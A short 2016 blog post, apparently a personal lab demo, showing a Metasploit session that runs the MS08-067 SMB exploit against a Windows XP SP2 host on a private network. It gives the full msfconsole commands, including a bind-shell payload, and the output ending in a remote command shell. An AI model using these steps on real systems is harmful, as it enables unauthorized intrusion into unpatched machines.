Thursday, 31 March 2016

Metasploit : Windows XP SP2

Simple and yes XP is obsolete and I am copying and pasting,
but this still reminds me of how simple Metasploit is
point-click-root indeed. 

Hacking is simply finding the right vulnerability 
(fuzzing reverse engineering ??) and coding an 
exploit or being in the right position or 
a miss configuration by the systems admin or
MiTM or MiTB hmmm or social engineering
or some port forward browser technique etc

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo Hobbit !!
echo Hobbit !!
Hobbit !!

No comments:

Post a Comment